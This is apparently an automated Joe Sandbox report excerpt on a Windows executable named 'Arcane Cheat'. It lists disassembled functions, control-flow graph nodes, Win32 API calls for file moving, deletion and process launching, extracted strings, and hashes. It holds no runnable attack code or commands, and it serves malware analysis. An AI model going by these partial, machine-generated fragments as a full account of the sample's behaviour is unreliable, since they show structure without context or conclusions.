                                  control_flow_graph 406 83bdf5-83be0d call 83e28c call 83e360 411 83be13-83be3d call 83aa36 406->411 412 83ca90-83ca9d 406->412 411->412 415 83be43-83be48 411->415 416 83be49-83be57 415->416 417 83be58-83be6d call 83a6c7 416->417 420 83be6f 417->420 421 83be71-83be86 call 8317ac 420->421 424 83be93-83be96 421->424 425 83be88-83be8c 421->425 427 83ca5c-83ca87 call 83aa36 424->427 428 83be9c 424->428 425->421 426 83be8e 425->426 426->427 427->416 440 83ca8d-83ca8f 427->440 430 83bea3-83bea6 428->430 431 83c132-83c134 428->431 432 83c115-83c117 428->432 433 83c074-83c076 428->433 430->427 438 83beac-83bf06 call 839da4 call 82b965 call 82a49d call 82a5d7 call 8270bf 430->438 431->427 436 83c13a-83c141 431->436 432->427 435 83c11d-83c12d SetWindowTextW 432->435 433->427 437 83c07c-83c088 433->437 435->427 436->427 441 83c147-83c160 436->441 442 83c08a-83c09b call 847168 437->442 443 83c09c-83c0a1 437->443 495 83c045-83c05a call 82a52a 438->495 440->412 448 83c162 441->448 449 83c168-83c176 call 8435b3 441->449 442->443 446 83c0a3-83c0a9 443->446 447 83c0ab-83c0b6 call 83ab9a 443->447 453 83c0bb-83c0bd 446->453 447->453 448->449 449->427 460 83c17c-83c185 449->460 458 83c0c8-83c0e8 call 8435b3 call 8435de 453->458 459 83c0bf-83c0c6 call 8435b3 453->459 480 83c101-83c103 458->480 481 83c0ea-83c0f1 458->481 459->458 464 83c187-83c18b 460->464 465 83c1ae-83c1b1 460->465 464->465 469 83c18d-83c195 464->469 471 83c1b7-83c1ba 465->471 472 83c296-83c2a4 call 82fe56 465->472 469->427 475 83c19b-83c1a9 call 82fe56 469->475 477 83c1c7-83c1e2 471->477 478 83c1bc-83c1c1 471->478 488 83c2a6-83c2ba call 8417cb 472->488 475->488 496 83c1e4-83c21e 477->496 497 83c22c-83c233 477->497 478->472 478->477 480->427 487 83c109-83c110 call 8435ce 480->487 485 83c0f3-83c0f5 481->485 486 83c0f8-83c100 call 847168 481->486 485->486 486->480 487->427 506 83c2c7-83c318 call 82fe56 call 83a8d0 GetDlgItem SetWindowTextW SendMessageW call 8435e9 488->506 507 83c2bc-83c2c0 488->507 512 83c060-83c06f call 82a4b3 495->512 513 83bf0b-83bf1f SetFileAttributesW 495->513 523 83c222-83c224 496->523 524 83c220 496->524 499 83c261-83c284 call 8435b3 * 2 497->499 500 83c235-83c24d call 8435b3 497->500 499->488 532 83c286-83c294 call 82fe2e 499->532 500->499 517 83c24f-83c25c call 82fe2e 500->517 539 83c31d-83c321 506->539 507->506 511 83c2c2-83c2c4 507->511 511->506 512->427 519 83bfc5-83bfd5 GetFileAttributesW 513->519 520 83bf25-83bf58 call 82b4f7 call 82b207 call 8435b3 513->520 517->499 519->495 529 83bfd7-83bfe6 DeleteFileW 519->529 549 83bf6b-83bf79 call 82b925 520->549 550 83bf5a-83bf69 call 8435b3 520->550 523->497 524->523 529->495 531 83bfe8-83bfeb 529->531 536 83bfef-83c01b call 82400a GetFileAttributesW 531->536 532->488 547 83bfed-83bfee 536->547 548 83c01d-83c033 MoveFileW 536->548 539->427 544 83c327-83c33b SendMessageW 539->544 544->427 547->536 548->495 551 83c035-83c03f MoveFileExW 548->551 549->512 556 83bf7f-83bfbe call 8435b3 call 83f350 549->556 550->549 550->556 551->495 556->519
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0083BDFA
                                    • Part of subcall function 0083AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0083AAFE
                                  • SetWindowTextW.USER32(?,?), ref: 0083C127
                                  • _wcsrchr.LIBVCRUNTIME ref: 0083C2B1
                                  • GetDlgItem.USER32(?,00000066), ref: 0083C2EC
                                  • SetWindowTextW.USER32(00000000,?), ref: 0083C2FC
                                  • SendMessageW.USER32(00000000,00000143,00000000,0086A472), ref: 0083C30A
                                  • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0083C335
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                  • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                  • API String ID: 3564274579-312220925
                                  • Opcode ID: 0fcad0842988524b7b5b377656cfbb86fb53d0cb78308d891e16321985eb8d15
                                  • Instruction ID: 5e5eb8fef4eb5b2aeacf4a1e827d7c1fca45373357c6a93d4d8bece1d8ab043f
                                  • Opcode Fuzzy Hash: 0fcad0842988524b7b5b377656cfbb86fb53d0cb78308d891e16321985eb8d15
                                  • Instruction Fuzzy Hash: 8CE182B6D0062CAADB25EBA4DC45DEF737CFF54311F0040A6F609E3091EB749A888B91
                                  Function 0082D341 Relevance: 23.3, APIs: 4, Strings: 9, Instructions: 555COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 561 82d341-82d378 call 83e28c call 83e360 call 8415e8 568 82d37a-82d3a9 GetModuleFileNameW call 82bc85 call 82fe2e 561->568 569 82d3ab-82d3b4 call 82fe56 561->569 573 82d3b9-82d3dd call 829619 call 8299b0 568->573 569->573 580 82d3e3-82d3eb 573->580 581 82d7a0-82d7a6 call 829653 573->581 582 82d409-82d438 call 845a90 * 2 580->582 583 82d3ed-82d405 call 833781 * 2 580->583 587 82d7ab-82d7bb 581->587 595 82d43b-82d43e 582->595 594 82d407 583->594 594->582 596 82d444-82d44a call 829e40 595->596 597 82d56c-82d58f call 829d30 call 8435d3 595->597 601 82d44f-82d476 call 829bf0 596->601 597->581 606 82d595-82d5b0 call 829bf0 597->606 607 82d535-82d538 601->607 608 82d47c-82d484 601->608 618 82d5b2-82d5b7 606->618 619 82d5b9-82d5cc call 8435d3 606->619 612 82d53b-82d55d call 829d30 607->612 610 82d486-82d48e 608->610 611 82d4af-82d4ba 608->611 610->611 614 82d490-82d4aa call 845ec0 610->614 615 82d4e5-82d4ed 611->615 616 82d4bc-82d4c8 611->616 612->595 630 82d563-82d566 612->630 634 82d52b-82d533 614->634 635 82d4ac 614->635 623 82d519-82d51d 615->623 624 82d4ef-82d4f7 615->624 616->615 621 82d4ca-82d4cf 616->621 626 82d5f1-82d5f8 618->626 619->581 640 82d5d2-82d5ee call 83137a call 8435ce 619->640 621->615 629 82d4d1-82d4e3 call 845808 621->629 623->607 625 82d51f-82d522 623->625 624->623 631 82d4f9-82d513 call 845ec0 624->631 625->608 637 82d5fa 626->637 638 82d5fc-82d625 call 82fdfb call 8435d3 626->638 629->615 645 82d527 629->645 630->581 630->597 631->581 631->623 634->612 635->611 637->638 650 82d633-82d649 638->650 651 82d627-82d62e call 8435ce 638->651 640->626 645->634 654 82d731-82d757 call 82ce72 call 8435ce * 2 650->654 655 82d64f-82d65d 650->655 651->581 689 82d771-82d79d call 845a90 * 2 654->689 690 82d759-82d76f call 833781 * 2 654->690 657 82d664-82d669 655->657 659 82d66f-82d678 657->659 660 82d97c-82d984 657->660 662 82d684-82d68b 659->662 663 82d67a-82d67e 659->663 664 82d98a-82d98e 660->664 665 82d72b-82d72e 660->665 668 82d880-82d891 call 82fcbf 662->668 669 82d691-82d6b6 662->669 663->660 663->662 670 82d990-82d996 664->670 671 82d9de-82d9e4 664->671 665->654 691 82d976-82d979 668->691 692 82d897-82d8c0 call 82fe56 call 845885 668->692 676 82d6b9-82d6de call 8435b3 call 845808 669->676 677 82d722-82d725 670->677 678 82d99c-82d9a3 670->678 674 82d9e6-82d9ec 671->674 675 82da0a-82da2a call 82ce72 671->675 674->675 684 82d9ee-82d9f4 674->684 697 82da02-82da05 675->697 709 82d6e0-82d6ea 676->709 710 82d6f6 676->710 677->657 677->665 680 82d9a5-82d9a8 678->680 681 82d9ca 678->681 687 82d9c6-82d9c8 680->687 688 82d9aa-82d9ad 680->688 693 82d9cc-82d9d9 681->693 684->677 694 82d9fa-82da01 684->694 687->693 698 82d9c2-82d9c4 688->698 699 82d9af-82d9b2 688->699 689->581 690->689 691->660 692->691 721 82d8c6-82d93c call 831596 call 82fdfb call 82fdd4 call 82fdfb call 8458d9 692->721 693->677 694->697 698->693 704 82d9b4-82d9b8 699->704 705 82d9be-82d9c0 699->705 704->684 711 82d9ba-82d9bc 704->711 705->693 709->710 715 82d6ec-82d6f4 709->715 716 82d6f9-82d6fd 710->716 711->693 715->716 716->676 720 82d6ff-82d706 716->720 722 82d7be-82d7c1 720->722 723 82d70c-82d71a call 82fdfb 720->723 754 82d94a-82d95f 721->754 755 82d93e-82d947 721->755 722->668 725 82d7c7-82d7ce 722->725 730 82d71f 723->730 728 82d7d0-82d7d4 725->728 729 82d7d6-82d7d7 725->729 728->729 732 82d7d9-82d7e7 728->732 729->725 730->677 735 82d808-82d830 call 831596 732->735 736 82d7e9-82d7ec 732->736 744 82d832-82d84e call 8435e9 735->744 745 82d853-82d85b 735->745 738 82d805 736->738 739 82d7ee-82d803 736->739 738->735 739->736 739->738 744->730 748 82d862-82d87b call 82dd6b 745->748 749 82d85d 745->749 748->730 749->748 756 82d960-82d967 754->756 755->754 757 82d973-82d974 756->757 758 82d969-82d96d 756->758 757->756 758->730 758->757
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0082D346
                                  • _wcschr.LIBVCRUNTIME ref: 0082D367
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0082D328,?), ref: 0082D382
                                  • __fprintf_l.LIBCMT ref: 0082D873
                                    • Part of subcall function 0083137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0082B652,00000000,?,?,?,00010450), ref: 00831396
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                  • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                  • API String ID: 4184910265-980926923
                                  • Opcode ID: 66a955d3e9ae9d00d6c2f72eea63c590d065a6f697756660a48a3a9b0f64b35a
                                  • Instruction ID: 4a5209a98d2f70c24830e9c782c9b40b0cb3a941958b5657ce3320f607e19bf1
                                  • Opcode Fuzzy Hash: 66a955d3e9ae9d00d6c2f72eea63c590d065a6f697756660a48a3a9b0f64b35a
                                  • Instruction Fuzzy Hash: A412B1B19003299EDB24EFA8E841BEEBBB5FF04304F104569F505E7282EB749A84CB55
                                  Function 0083CB5A Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 0083AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0083AC85
                                    • Part of subcall function 0083AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0083AC96
                                    • Part of subcall function 0083AC74: IsDialogMessageW.USER32(00010450,?), ref: 0083ACAA
                                    • Part of subcall function 0083AC74: TranslateMessage.USER32(?), ref: 0083ACB8
                                    • Part of subcall function 0083AC74: DispatchMessageW.USER32(?), ref: 0083ACC2
                                  • GetDlgItem.USER32(00000068,0087ECB0), ref: 0083CB6E
                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,0083A632,00000001,?,?,0083AECB,00854F88,0087ECB0), ref: 0083CB96
                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0083CBA1
                                  • SendMessageW.USER32(00000000,000000C2,00000000,008535B4), ref: 0083CBAF
                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0083CBC5
                                  • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0083CBDF
                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0083CC23
                                  • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0083CC31
                                  • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0083CC40
                                  • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0083CC67
                                  • SendMessageW.USER32(00000000,000000C2,00000000,0085431C), ref: 0083CC76
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                  • String ID: \
                                  • API String ID: 3569833718-2967466578
                                  • Opcode ID: 622e8b148a2e424ef9c04c059d17150e0ce6fc40b9c76fa6becf3b5ba746f02c
                                  • Instruction ID: 492b5158b71a24dcfb59bc747613d0cd5586c468813b27ce480ce01eb1e9f374
                                  • Opcode Fuzzy Hash: 622e8b148a2e424ef9c04c059d17150e0ce6fc40b9c76fa6becf3b5ba746f02c
                                  • Instruction Fuzzy Hash: DB31AD71185751ABE301DF249C4AFAB7EACFF82704F000518FA91962E1DB755908C7BB
                                  Function 0083CE22 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 796 83ce22-83ce3a call 83e360 799 83ce40-83ce4c call 8435b3 796->799 800 83d08b-83d093 796->800 799->800 803 83ce52-83ce7a call 83f350 799->803 806 83ce84-83ce91 803->806 807 83ce7c 803->807 808 83ce93 806->808 809 83ce95-83ce9e 806->809 807->806 808->809 810 83cea0-83cea2 809->810 811 83ced6 809->811 812 83ceaa-83cead 810->812 813 83ceda-83cedd 811->813 814 83ceb3-83cebb 812->814 815 83d03c-83d041 812->815 816 83cee4-83cee6 813->816 817 83cedf-83cee2 813->817 818 83cec1-83cec7 814->818 819 83d055-83d05d 814->819 820 83d043 815->820 821 83d036-83d03a 815->821 822 83cef9-83cf0e call 82b493 816->822 823 83cee8-83ceef 816->823 817->816 817->822 818->819 825 83cecd-83ced4 818->825 827 83d065-83d06d 819->827 828 83d05f-83d061 819->828 826 83d048-83d04c 820->826 821->815 821->826 831 83cf10-83cf1d call 8317ac 822->831 832 83cf27-83cf32 call 82a180 822->832 823->822 829 83cef1 823->829 825->811 825->812 826->819 827->813 828->827 829->822 831->832 837 83cf1f 831->837 838 83cf34-83cf4b call 82b239 832->838 839 83cf4f-83cf5c ShellExecuteExW 832->839 837->832 838->839 841 83cf62-83cf6f 839->841 842 83d08a 839->842 844 83cf82-83cf84 841->844 845 83cf71-83cf78 841->845 842->800 846 83cf86-83cf8f 844->846 847 83cf9b-83cfba call 83d2e6 844->847 845->844 848 83cf7a-83cf80 845->848 846->847 857 83cf91-83cf99 ShowWindow 846->857 849 83cff1-83cffd CloseHandle 847->849 866 83cfbc-83cfc4 847->866 848->844 848->849 850 83cfff-83d00c call 8317ac 849->850 851 83d00e-83d01c 849->851 850->851 863 83d072 850->863 855 83d079-83d07b 851->855 856 83d01e-83d020 851->856 855->842 860 83d07d-83d07f 855->860 856->855 861 83d022-83d028 856->861 857->847 860->842 864 83d081-83d084 ShowWindow 860->864 861->855 865 83d02a-83d034 861->865 863->855 864->842 865->855 866->849 867 83cfc6-83cfd7 GetExitCodeProcess 866->867 867->849 868 83cfd9-83cfe3 867->868 869 83cfe5 868->869 870 83cfea 868->870 869->870 870->849
                                  APIs
                                  • ShellExecuteExW.SHELL32(?), ref: 0083CF54
                                  • ShowWindow.USER32(?,00000000), ref: 0083CF93
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 0083CFCF
                                  • CloseHandle.KERNEL32(?), ref: 0083CFF5
                                  • ShowWindow.USER32(?,00000001), ref: 0083D084
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                  • String ID: $.exe$.inf
                                  • API String ID: 3686203788-2452507128
                                  • Opcode ID: 29d29cdb5845955bbe694e732c4cae7afdc0daffa7c34cd8dc029def053c69f8
                                  • Instruction ID: ddd140b644df70b338a314151f033e53239086584eaab0088c0d499c9f6d7311
                                  • Opcode Fuzzy Hash: 29d29cdb5845955bbe694e732c4cae7afdc0daffa7c34cd8dc029def053c69f8
                                  • Instruction Fuzzy Hash: 0661F3704087809ADB319F28E814AABBBE9FFD5704F044819F5C5E7254DBB19989CBD2
                                  Function 0084A058 Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 871 84a058-84a071 872 84a087-84a08c 871->872 873 84a073-84a083 call 84e6ed 871->873 875 84a08e-84a096 872->875 876 84a099-84a0bd MultiByteToWideChar 872->876 873->872 883 84a085 873->883 875->876 877 84a250-84a263 call 83ec4a 876->877 878 84a0c3-84a0cf 876->878 880 84a0d1-84a0e2 878->880 881 84a123 878->881 884 84a0e4-84a0f3 call 851a30 880->884 885 84a101-84a112 call 848518 880->885 887 84a125-84a127 881->887 883->872 890 84a245 884->890 897 84a0f9-84a0ff 884->897 885->890 898 84a118 885->898 887->890 891 84a12d-84a140 MultiByteToWideChar 887->891 895 84a247-84a24e call 84a2c0 890->895 891->890 894 84a146-84a158 call 84a72c 891->894 900 84a15d-84a161 894->900 895->877 902 84a11e-84a121 897->902 898->902 900->890 903 84a167-84a16e 900->903 902->887 904 84a170-84a175 903->904 905 84a1a8-84a1b4 903->905 904->895 906 84a17b-84a17d 904->906 907 84a1b6-84a1c7 905->907 908 84a200 905->908 906->890 909 84a183-84a19d call 84a72c 906->909 911 84a1e2-84a1f3 call 848518 907->911 912 84a1c9-84a1d8 call 851a30 907->912 910 84a202-84a204 908->910 909->895 924 84a1a3 909->924 914 84a206-84a21f call 84a72c 910->914 915 84a23e-84a244 call 84a2c0 910->915 911->915 923 84a1f5 911->923 912->915 927 84a1da-84a1e0 912->927 914->915 929 84a221-84a228 914->929 915->890 928 84a1fb-84a1fe 923->928 924->890 927->928 928->910 930 84a264-84a26a 929->930 931 84a22a-84a22b 929->931 932 84a22c-84a23c WideCharToMultiByte 930->932 931->932 932->915 933 84a26c-84a273 call 84a2c0 932->933 933->895
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00844E35,00844E35,?,?,?,0084A2A9,00000001,00000001,3FE85006), ref: 0084A0B2
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0084A2A9,00000001,00000001,3FE85006,?,?,?), ref: 0084A138
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,3FE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0084A232
                                  • __freea.LIBCMT ref: 0084A23F
                                    • Part of subcall function 00848518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0084C13D,00000000,?,008467E2,?,00000008,?,008489AD,?,?,?), ref: 0084854A
                                  • __freea.LIBCMT ref: 0084A248
                                  • __freea.LIBCMT ref: 0084A26D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                  • String ID:
                                  • API String ID: 1414292761-0
                                  • Opcode ID: 6f41c441d2c53eaf8f59899e92d387e5a48c6687e2fe66a4e02e688369851590
                                  • Instruction ID: 7568e7fb4011779d7c44d145fd93378d4bfed927df3f8160646987fa5d084182
                                  • Opcode Fuzzy Hash: 6f41c441d2c53eaf8f59899e92d387e5a48c6687e2fe66a4e02e688369851590
                                  • Instruction Fuzzy Hash: CA51B07269022EAFEB298F64CC81EBF77A9FB44750F154229FC05DA140EB75DC40D6A2
                                  Function 0083A335 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35comCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00830085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008300A0
                                    • Part of subcall function 00830085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0082EB86,Crypt32.dll,00000000,0082EC0A,?,?,0082EBEC,?,?,?), ref: 008300C2
                                  • OleInitialize.OLE32(00000000), ref: 0083A34E
                                  • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0083A385
                                  • SHGetMalloc.SHELL32(00868430), ref: 0083A38F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                  • String ID: riched20.dll$3To
                                  • API String ID: 3498096277-2168385784
                                  • Opcode ID: 84b3320ae23ac64654da61bf6c30c0d95c41c0c1a02c205f78f64daffdfb4736
                                  • Instruction ID: 82213f39c5e8840ce2c7f8063fc35049737fb999e6c0476efd8a0197f2a36a6a
                                  • Opcode Fuzzy Hash: 84b3320ae23ac64654da61bf6c30c0d95c41c0c1a02c205f78f64daffdfb4736
                                  • Instruction Fuzzy Hash: 0FF0F9B1D0020AABDB10AF9AD8499EFFBFCFF95705F00415AE814E2240DBB856458FA1
                                  Function 008299B0 Relevance: 7.6, APIs: 5, Instructions: 117filetimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 940 8299b0-8299d1 call 83e360 943 8299d3-8299d6 940->943 944 8299dc 940->944 943->944 946 8299d8-8299da 943->946 945 8299de-8299fb 944->945 947 829a03-829a0d 945->947 948 8299fd 945->948 946->945 949 829a12-829a31 call 8270bf 947->949 950 829a0f 947->950 948->947 953 829a33 949->953 954 829a39-829a57 CreateFileW 949->954 950->949 953->954 955 829abb-829ac0 954->955 956 829a59-829a7b GetLastError call 82b66c 954->956 957 829ac2-829ac5 955->957 958 829ae1-829af5 955->958 965 829aaa-829aaf 956->965 966 829a7d-829a9f CreateFileW GetLastError 956->966 957->958 960 829ac7-829adb SetFileTime 957->960 961 829b13-829b1e 958->961 962 829af7-829b0f call 82fe56 958->962 960->958 962->961 965->955 967 829ab1 965->967 969 829aa1 966->969 970 829aa5-829aa8 966->970 967->955 969->970 970->955 970->965
                                  APIs
                                  • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,?,00000000,?,00000000,?,?,008278AD,?,00000005,?,00000011), ref: 00829A4C
                                  • GetLastError.KERNEL32(?,?,008278AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00829A59
                                  • CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,008278AD,?,00000005,?), ref: 00829A8E
                                  • GetLastError.KERNEL32(?,?,008278AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00829A96
                                  • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,008278AD,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00829ADB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: File$CreateErrorLast$Time
                                  • String ID:
                                  • API String ID: 1999340476-0
                                  • Opcode ID: 62344c54b672d4024c82e5c94fb68782a2a2fa894465e863f4bce4ab51ff4452
                                  • Instruction ID: f813dfe120070d4de434a151bef9335e9528159069e175b0871a867377a49ea1
                                  • Opcode Fuzzy Hash: 62344c54b672d4024c82e5c94fb68782a2a2fa894465e863f4bce4ab51ff4452
                                  • Instruction Fuzzy Hash: 86417870544B656FE7209B24EC05BDABBE4FB01324F100719F9E5D61D1E378A9C8CBA2
                                  Function 0083AC74 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
